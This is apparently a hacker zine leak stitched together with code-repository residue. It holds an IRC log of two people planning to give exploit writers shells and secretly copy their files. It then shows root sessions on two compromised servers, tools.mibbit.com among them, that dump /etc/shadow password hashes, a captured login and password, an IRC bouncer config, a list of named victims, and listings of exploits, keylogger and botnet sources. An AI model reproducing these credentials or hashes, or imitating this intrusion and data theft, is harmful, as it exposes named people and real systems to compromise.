15:01 <|silent_> a question...
15:01 <|silent_> is it right that emails stay in queue some days if server
is offline?
15:02 <|silent_> and 2. question ;P can you install grsec? and remove suid
progs as long as they aren't needed?
15:04 <|silent_> cuz as you know (i guess) i'm member of m00-antisecurity
and priv8 hehe and i want to give the coder shells for free :D
<-------------
15:05 <|silent_> so they put some private stuff on it and i add a daemon
which copy all files from users homedir if there are new files incoming :D
<----------
15:05 <|silent_> so i get all the exploits :) <---------------
15:09 <stigma> yes
15:09 <stigma> i can install grsec
15:09 <stigma> and remove uneccecssarry suids
15:10 <stigma> nice ;)
15:10 <stigma> do that
15:10 <stigma> i'll help you to secure it
20:20 <silentoo> but remember i'll add m00 and priv8 ppl <---------
20:20 <stigma> then we'll degrade
20:20 <stigma> grrr
20:20 <stigma> fuck :P
20:20 <silentoo> hahaha :D
20:20 <silentoo> i add all the coder :D
20:20 <stigma> hahaha :P
20:20 <silentoo> so we can take their sources and advisories :D
<----------------
20:20 <stigma> you've talked to them ?
20:20 <silentoo> yep
20:20 <stigma> yep :P
20:21 <silentoo> i announced in m00 members page that i'll got a server for
the coders :)
20:21 <stigma> then we root fbi.gov <--- lol keep dreaming.
20:21 <silentoo> hahaha
20:21 <silentoo> not from my server :D
20:21 <stigma> i will :P
20:21 <silentoo> but we have to think about something which copy all new
downloaded files to a special folder ;D <--------------
20:22 <silentoo> so that we can get it later :p
<---------------
20:22 <silentoo> and we have to manipulate w and who so that ppl just see
their own processes
20:22 <silentoo> ehrm
20:22 <silentoo> own connections
---------------------------------------------------------------------------------------------------------------------------
*QOUTE* "18:55 <stigma> they wont manage it :P" *QOUTE*
digitaljunk:~$ uname -a; id
Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST
2005 i686 GNU/Linux
uid=1000(silent) gid=100(users) Gruppen=100(users)
digitaljunk:~$ ls
coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv
digitaljunk:~$ cd Maildir/
digitaljunk:~/Maildir$ cd new/
digitaljunk:~/Maildir/new$ ls
1117646738.V302I40e226M724551.localhost.localdomain
1117675319.V302I40e24eM969104.localhost.localdomain
1117762454.V302I40e29eM992998.localhost.localdomain
1117897564.V302I40e2b7M732798.localhost.localdomain
1117650803.V302I40e229M467122.localhost.localdomain
1117676356.V302I40e24fM100457.localhost.localdomain
1117768511.V302I40e29fM290776.localhost.localdomain
1117915062.V302I40e2bbM630625.localhost.localdomain
1117652859.V302I40e22aM436279.localhost.localdomain
1117712986.V302I40e25dM30075.localhost.localdomain
1117818555.V302I40e29dM724750.localhost.localdomain
1117917780.V302I40e2bcM235205.localhost.localdomain
1117655721.V302I40e238M3168.localhost.localdomain
1117719477.V302I40e25eM347674.localhost.localdomain
1117848836.V302I40e239M381375.localhost.localdomain
1117935215.V302I40e2c0M49289.localhost.localdomain
1117664262.V302I40e24cM577076.localhost.localdomain
1117720174.V302I40e25fM586414.localhost.localdomain
1117872587.V302I40e2b6M182787.localhost.localdomain
1117962158.V302I40e2c1M125556.localhost.localdomain
1117670079.V302I40e24dM301950.localhost.localdomain
1117740176.V302I40e29aM916861.localhost.localdomain
1117895970.V302I40e2b9M539557.localhost.localdomain
digitaljunk:~/Maildir/new$ cat
1117646738.V302I40e226M724551.localhost.localdomain
Return-Path: <wwwrun@team-gesus.org>
X-Original-To: silent@oral-sex.bz
Delivered-To: silent@oral-sex.bz
Received: from dd1826.kasserver.com (dd1826.kasserver.com [81.209.148.73])
by mail.digitaljunk.de (Postfix) with ESMTP id A36241AF2EE
for <silent@oral-sex.bz>; Wed, 1 Jun 2005 19:25:38 +0200 (CEST)
Received: by dd1826.kasserver.com (Postfix, from userid 30)
id 65358735BA; Tue, 31 May 2005 14:11:06 +0200 (CEST)
To: silent@oral-sex.bz
Subject: Team Gesus
From: homeless@sex.com
Message-Id: <20050531121106.65358735BA@dd1826.kasserver.com>
Date: Tue, 31 May 2005 14:11:06 +0200 (CEST)
Someone logged in!
User: Ch4oS
Pass: ubpdntv9
digitaljunk:~/Maildir/new$ ls
1117646738.V302I40e226M724551.localhost.localdomain
1117675319.V302I40e24eM969104.localhost.localdomain
1117762454.V302I40e29eM992998.localhost.localdomain
1117897564.V302I40e2b7M732798.localhost.localdomain
1117650803.V302I40e229M467122.localhost.localdomain
1117676356.V302I40e24fM100457.localhost.localdomain
1117768511.V302I40e29fM290776.localhost.localdomain
1117915062.V302I40e2bbM630625.localhost.localdomain
1117652859.V302I40e22aM436279.localhost.localdomain
1117712986.V302I40e25dM30075.localhost.localdomain
1117818555.V302I40e29dM724750.localhost.localdomain
1117917780.V302I40e2bcM235205.localhost.localdomain
1117655721.V302I40e238M3168.localhost.localdomain
1117719477.V302I40e25eM347674.localhost.localdomain
1117848836.V302I40e239M381375.localhost.localdomain
1117935215.V302I40e2c0M49289.localhost.localdomain
1117664262.V302I40e24cM577076.localhost.localdomain
1117720174.V302I40e25fM586414.localhost.localdomain
1117872587.V302I40e2b6M182787.localhost.localdomain
1117962158.V302I40e2c1M125556.localhost.localdomain
1117670079.V302I40e24dM301950.localhost.localdomain
1117740176.V302I40e29aM916861.localhost.localdomain
1117895970.V302I40e2b9M539557.localhost.localdomain
digitaljunk:~/Maildir/new$ cat
1117650803.V302I40e229M467122.localhost.localdomain
Return-Path: <mailinglists@frsirt.com>
X-Original-To: silent@oral-sex.bz
Delivered-To: silent@oral-sex.bz
Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153])
by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE
for <silent@oral-sex.bz>; Wed, 1 Jun 2005 20:33:23 +0200 (CEST)
Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000
Date: 31 May 2005 09:32:46 -0000
Message-ID: <20050531093246.7663.qmail@ns30617.ovh.net>
To: silent@oral-sex.bz
Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x
"preg_replace" Exploit
From: FrSIRT Alerts <mailinglists@frsirt.com>
X-Sender: <mailinglists@frsirt.com>
Mime-Version: 1.0
charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
----------------------------------------------------------------------
FrSIRT / Exploits and Codes
----------------------------------------------------------------------
The French Security Incident Response Team 24/24 & 7/7
----------------------------------------------------------------------
- 31 May 2005 -
----------------------------------------------------------------------
- Microsoft Windows COM Structured Storage Local Exploit (MS05-012)
http://www.frsirt.com/exploits/20050531.SSExploit.c.php
- Zeroboard 4.x "preg_replace" Remote Command Execution Exploit
http://www.frsirt.com/exploits/20050531.zeroboard.c.php
----------------------------------------------------------------------
Copyright © 2002-2005 - FrSIRT.COM
----------------------------------------------------------------------
digitaljunk:~/Maildir/new$ cd
digitaljunk:~$ pwd
/home/silent
digitaljunk:~$ ls
coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv
digitaljunk:~$ cd psybnc/
digitaljunk:~/psybnc$ ls
CHANGES config.h COPYING FAQ help key lang log Makefile
makefile.out makesalt menuconf motd psybnc psybncchk psybnc.conf
psybnc.conf.old psybnc.pid README SCRIPTING scripts src targets.mak
TODO tools
digitaljunk:~/psybnc$ cat psybnc.conf
PSYBNC.SYSTEM.PORT1=9000
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=silent
USER1.USER.USER=We can't stop here! It's batcountry!
USER1.USER.PASS==0d`=`q0E`f'P'k`p`Z
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=0
USER1.USER.DCCENABLED=1
USER1.USER.AUTOGETDCC=0
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.CERT=+
USER1.USER.NICK=|silent
USER1.SERVERS.SERVER1=irc.inet.tele.dk
USER1.SERVERS.PORT1=6668
USER1.CHANNELS.ENTRY1=#heppy_quaxx
USER1.CHANNELS.ENTRY2=#se
USER1.CHANNELS.ENTRY3=#blackhats
USER1.CHANNELS.ENTRY0=#netcafe
USER2.USER.LOGIN=silent
USER2.USER.USER=We can't stop here! It's batcountry!
USER2.USER.PASS==0d`=`q0E`f'P'k`p`Z
USER2.USER.NETWORK=B
USER2.USER.RIGHTS=1
USER2.USER.VLINK=0
USER2.USER.PPORT=0
USER2.USER.PARENT=1
USER2.USER.QUITTED=0
USER2.USER.DCCENABLED=0
USER2.USER.AUTOGETDCC=0
USER2.USER.AIDLE=0
USER2.USER.LEAVEQUIT=0
USER2.USER.AUTOREJOIN=0
USER2.USER.SYSMSG=0
USER2.USER.LASTLOG=0
USER2.USER.CERT=+
USER2.USER.NICK=|silent
USER2.SERVERS.SERVER1=S=irc.blackhat.ru
USER2.SERVERS.PORT1=6697
USER2.CHANNELS.ENTRY0=#m00
digitaljunk:~/psybnc$ cd ..
digitaljunk:~$ ls
coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv
digitaljunk:~$ cd coding/
digitaljunk:~/coding$ ls
cokebot dev-files done php samples
digitaljunk:~/coding$ ls *
cokebot:
bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile
dev-files:
blowfish-dev mysql-dev
done:
kaiten.c keyloger.c libirc.tar.gz uingen.c
php:
bleattern.php getfiletime.php nospam.php random_pass.php upload.php
urlvalid.php validate_mail.php
samples:
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
digitaljunk:~/coding$ cd cokebot
digitaljunk:~/coding/cokebot$ cat cokebot.c
/*
****** PRIVATE EDITION ******
* *
* cokebot v.0.5 beta *
* © 2004 by |silent *
* *
*****************************
Changelog: 08.11.2004
+ added reconnect feature!
Changelog: 03.11.2004
+ added part command
+ added restart command (beta! too lazy to fork() ;D will do it soon!)
Changelog: 02.11.2004
+ added static login (eh? missing part cmd see TODO)
+ added chanlist (beta! chan/chankey support done!)
+ added userlist support
+ replaced join/op/deop/die/whoami commands for user-support
+ added userlist with authlevel
+ added support for older gcc
Changelog: 01.11.2004
+ rewrote command system
+ radnom nick/user/ident
+ updated conn()
+ added nick system (completation etc..)
+ blowfish cryption (beta)
+ segfault on quit fixed
+ fixed segfault on non-existing sites.conf
Changelog: 31.10.2004
+ radnom nick/user/ident
+ replaced sendtotarget()
+ static server/port
+ added commandlist by char
TODO:
- use linked lists for chans
- restart fork()
- better blowfish implementation
- doconf() to create conf-files if non exist
- crypted userlist
- crypted chanlist
- add modes etc.. to chanlist
- sitemanager
- admin control to modify chans/user
- useradd
- evilmode
- hidden process
- shellcommands
*/
digitaljunk:~/coding/cokebot$ cd ..
digitaljunk:~/coding$ ls
cokebot dev-files done php samples
digitaljunk:~/coding$ cd done/
digitaljunk:~/coding/done$ ls
kaiten.c keyloger.c libirc.tar.gz uingen.c
digitaljunk:~/coding/done$ cat kaiten.c
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE
//
////////////////////////////////////////////////////////////////////////////////
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have
to
#define FAKENAME "-bash" // What you want this to hide as
#define CHAN "#stormx" // Channel to join
#define KEY "sex" // The key of the channel
int numservers=3; // Must change this to equal number of
servers down there
char *servers[] = { // List the servers in that format, always
end in (void*)0
"irc.inet.tele.dk",
"irc.efnet.nl",
"irc.isdnet.fr",
(void*)0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE!
//
////////////////////////////////////////////////////////////////////////////////
digitaljunk:~/coding/done$ cat keyloger.c
/*
Simple Keyloger - by |silent
*/
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>
digitaljunk:~/coding/done$ cat uingen.c
#include <stdio.h>
#include <stdlib.h>
void welcome() {
printf("[-] UINGen by |silent\n");
printf("[-] (c) 2004 |silent\n");
printf("[-] Contact: silent@oral-sex.bz\n");
printf("[-] Website: http://blackhat.tv\n");
}
void usage() {
printf("[-] Usage: ./uingen -f <first-uin> -l <last-uin> [-po]\n");
printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o
uinlist.txt\n");
printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o
brutelist.txt\n");
printf("[-] -f First UIN\n");
printf("[-] -l Last UIN\n");
printf("[-] -s Single UIN/Wordlist Mode [-w required]\n");
printf("[-] -w Wordlist [for single UIN mode only]\n");
printf("[-] -p Password [default: password]\n");
printf("[-] -o Outfile [default: outfile.txt]\n");
exit(1);
}
digitaljunk:~/coding$ cd samples/
digitaljunk:~/coding/samples$ ls
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
digitaljunk:~/coding/samples$ cd
Where are those codes......
digitaljunk:~$ cd htdocs/
digitaljunk:~/htdocs$ ls
213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz
digitaljunk:~/htdocs$ cd digitaljunk.de/
digitaljunk:~/htdocs/digitaljunk.de$ ls
1211040546_G.jpg awstats.greyhat.co.uk.conf configure.txt di.tgz
google inc P1010103.JPG route
Sorgenkint_-_Swingerclub_E.P.rar thumb.php view.php
303.MPG base64.jpg content
DJ_Man_at_Arms_-_Acidkiller.rar image index.php priv8.php
sambuca.gif stats tor3.b64 www
amphe.jpg CIMG0311.JPG css gallery.php
images P1010095.JPG priv8v.php shoutbox.php test.php
tor3.jpg
digitaljunk:~/htdocs/digitaljunk.de$ cd content/
digitaljunk:~/htdocs/digitaljunk.de/content$ ls
coding config pixx priv8 smile snippets sources vidz
www.technoharmony.de
digitaljunk:~/htdocs/digitaljunk.de/content$ ls *
coding:
exploits snippets sources
config:
bitchxrc config giftd.conf ipfw.conf menu.xml ports-supfile vimrc
vsftpd.conf zshenv
pixx:
Auesee bday Ebba Flunkyball Friends Hanna Joerdis KSS-NRW p_old
Saufabend Wolfskuhlen
priv8:
friday mobile
smile:
19.gif augen.jpg brav.gif cry.gif
fliege.gif kaoz.gif love-smiley-087.gif
narren.gif p.gif roll.gif top.gif
1party43.gif avatar.gif buch.gif dance.gif
fly2.gif knuddel.gif mad.gif
naughty.gif pil.gif sam55mC.jpg toptop.gif
789a.gif avatar_isa.jpg caught.gif dude.gif
(.gif krank.gif matrix2-1.gif
newwer.gif popcorn.gif schaf_2.gif typ1.jpg
8).gif bigredsmiley.gif cheer_icoon.gif erschiess.gif
hello.gif lam.gif mixed-smiley-043.gif
o.gif poppen.gif smilysun.gif weird.gif
alki.gif blink.gif confused-smiley-013.gif evil.gif
heureka.gif liebe_62.gif motz2.gif
omg.gif puke.gif spiralnebel.gif
anbet.gif bluegrab.gif coolsmoke.gif
f19d884c6e6140c1aaea812bc8e8fa60.jpg huepfen.gif lol.gif
muh_schild.png party_4.gif question.gif stupid.gif
angel.gif bong.gif cow.gif fatal-elias1.png
imwithstupid.gif lollol.gif musik.gif
peace2.gif roflmao.gif tits.gif
snippets:
sources:
axis-0wner.c bot.pl cleanup_braindb.tcl freshmeat.tcl
heise.tcl http.tcl ipv6-up.sh md5crypt.pl proxy.c
rosec-sniff.c si.c symantec.tcl zone-h.tcl
banner.c brain.tcl computerworld.tcl fuckhost3.c hell.c
imdb.tcl itoa.h ntpdump.c pscan.c
secnet-nossl.pl slashdot.tcl uroot.c
bd-src.c bugtraq.tcl evilshell.c google.tcl
hellcode.c ipgen.c kaiten.c onlinekosten.tcl reppid.c
securitynews.tcl spiegel.tcl worm.cpp
bind.c ChanPeak1.3ger.tcl execget.c hc.c
httpgrab.c ipv6.c massmailer.c phpexpl.c requestips.sh
security.tcl ssn.tcl zdnet.tcl
vidz:
afterhour-part1.avi silent_owned.wmv
www.technoharmony.de:
special
digitaljunk:~/htdocs/digitaljunk.de/content$ cd coding/exploits/
digitaljunk:~/htdocs/digitaljunk.de/content/coding/exploits$ ls
axis-0wner.c die_putze.0.6.tar.gz kit.tgz.tar
m00-samba-pwnd.tar.bz2 mirc-6.14.c phpbb.tar.gz seXFree.c
sol-dtscd.tar.gz st.tgz sunroot.tar
bmon.c ES-PsyJack.tar m00-0Wn-0x333.c m00-smtpclame.c
msqlfast.c proftpd1.2.7-9_mass_m00.c skinhead.tgz spypipe.c
sudo-exploit.c tlswrap0.7.tar.gz
bot.rar fakepsy.c m00-omfg-HL-again.c map.rar
nkit6.tar raq4-scan.zip SK.rar sqlhello.zip
sudos.c UHAGr-jidentd-exploit.tar.gz
BINGO!
digitaljunk:~/htdocs/digitaljunk.de/content/coding/exploits$ cd ..
digitaljunk:~/htdocs/digitaljunk.de/content/coding$ ls
exploits snippets sources
digitaljunk:~/htdocs/digitaljunk.de/content/coding$ ls sources/
agobot3-0.2.1-pre4-priv.rar blow BlowSXT.rar connectback.pl hookbot.tgz
kaiten.c libirc.tar.gz mysql pftp-src.0.11.4.tgz shijack.c sock.c
uingen.c
digitaljunk:~$ su root
Password:
digitaljunk:/home/silent# export HISTFILE=/dev/null
digitaljunk:/home/silent# id
uid=0(root) gid=0(root) Gruppen=0(root)
digitaljunk:/home/silent# cd
digitaljunk:~# ls
allsql.sql candicrew_home.tgz cyrus-imapd-2.2.12.tar.gz
db-4.3.28 ebba_home.tgz oidentd-2.0.7
pam_mysql-0.5.tar.gz procmail-3.22 video.asp?video=V8-Chainsaw
awstats-6.5.tar.gz cybersoft_inkasso_home.tgz cyrus-sasl-2.1.21
db-4.3.28.tar.gz install-report.template oidentd-2.0.7.tar.gz
postfix-2.1.6 procmail-3.22.tar.gz waterguide_home.tgz
awstats-6.5.tar.gz.1 cyrus-imapd-2.2.12 cyrus-sasl-2.1.21.tar.gz
dbootstrap_settings Mail pam_mysql
postfix-2.1.6.tar.gz vhosts.conf.backup webmin-1.200.tar.gz
digitaljunk:/home/silent# cd
digitaljunk:~# ls
allsql.sql candicrew_home.tgz cyrus-imapd-2.2.12.tar.gz
db-4.3.28 ebba_home.tgz oidentd-2.0.7
pam_mysql-0.5.tar.gz procmail-3.22 video.asp?video=V8-Chainsaw
awstats-6.5.tar.gz cybersoft_inkasso_home.tgz cyrus-sasl-2.1.21
db-4.3.28.tar.gz install-report.template oidentd-2.0.7.tar.gz
postfix-2.1.6 procmail-3.22.tar.gz waterguide_home.tgz
awstats-6.5.tar.gz.1 cyrus-imapd-2.2.12 cyrus-sasl-2.1.21.tar.gz
dbootstrap_settings Mail pam_mysql
postfix-2.1.6.tar.gz vhosts.conf.backup webmin-1.200.tar.gz
digitaljunk:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:102:102::/var/spool/exim4:/bin/false
sshd:x:100:65534::/var/run/sshd:/bin/false
mysql:x:101:104:MySQL Server,,,:/var/lib/mysql:/bin/false
silent:x:1000:100::/home/silent:
breath:x:1001:100::/home/breath:
upload:x:1002:100::/home/silent/upload:/bin/false
stigma:x:1003:100::/home/stigma:/bin/bash
hillside:x:1004:100::/home/hillside:/bin/bash
bind:x:103:105::/var/cache/bind:/bin/false
tuborg:x:1005:100::/home/tuborg:
cyrus:x:1006:8::/usr/cyrus:
postfix:x:33333:33333::/dev/null:/bin/false
dovecot:x:106:106:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
tech:x:1007:1007:,,,:/home/tech:/bin/bash
marius:x:33334:100:Mail User:/home/mailusers/marius:/bin/false
jonas:x:33335:100:Mail user:/home/mailusers/jonas:/bin/false
bjerkis:x:33336:100:Mail user:/home/mailusers/bjerkis:/bin/false
digitaljunk:~# cat /etc/shadow
root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7:::
daemon:*:12893:0:99999:7:::
bin:*:12893:0:99999:7:::
sys:*:12893:0:99999:7:::
sync:*:12893:0:99999:7:::
games:*:12893:0:99999:7:::
man:*:12893:0:99999:7:::
lp:*:12893:0:99999:7:::
mail:*:12893:0:99999:7:::
news:*:12893:0:99999:7:::
uucp:*:12893:0:99999:7:::
proxy:*:12893:0:99999:7:::
www-data:*:12893:0:99999:7:::
backup:*:12893:0:99999:7:::
list:*:12893:0:99999:7:::
irc:*:12893:0:99999:7:::
gnats:*:12893:0:99999:7:::
nobody:*:12893:0:99999:7:::
Debian-exim:!:12893:0:99999:7:::
sshd:!:12893:0:99999:7:::
mysql:!:12893:0:99999:7:::
silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7:::
breath:!:12934:0:99999:7:::
upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7:::
stigma:$1$tXmQAvtL$aW5h.0m/oIqzClFRK2Qh..:12934:0:99999:7:::
hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7:::
bind:!:12934:0:99999:7:::
tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7:::
cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7:::
postfix:!:12934:0:99999:7:::
dovecot:!:12935:0:99999:7:::
tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7:::
marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7:::
jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7:::
bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7:::
*QOUTE* "18:55 <stigma> they wont manage it :P" *QOUTE*

4280
dikline/skew.txt
View file

File diff suppressed because it is too large Load diff

2253
dikline/unl.txt
View file

File diff suppressed because it is too large Load diff

5091
el8/el8.0.txt
View file

File diff suppressed because it is too large Load diff

8669
el8/el8.1.txt
View file

File diff suppressed because it is too large Load diff

8695
el8/el8.2.txt
View file

File diff suppressed because it is too large Load diff

7853
el8/el8.3.txt
View file

File diff suppressed because it is too large Load diff

13899
h0no/h0no 2.txt
View file

File diff suppressed because it is too large Load diff

13794
h0no/h0no 3.txt
View file

File diff suppressed because it is too large Load diff

14416
h0no/h0no.txt
View file

File diff suppressed because it is too large Load diff

747
htp/HTP-2.txt
View file

@ -1,747 +0,0 @@
HACK THE PLANET
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't?
Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in
defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec.
However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's
exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I
would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our
various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a
group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups
like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the
mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you
can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from
Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit
fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- Mibbit
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h () ck ~]$ ssh root () tools mibbit com
root () tools mibbit com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root () tools:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root () tools:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root () tools:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root () tools:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root () tools:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root () tools:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
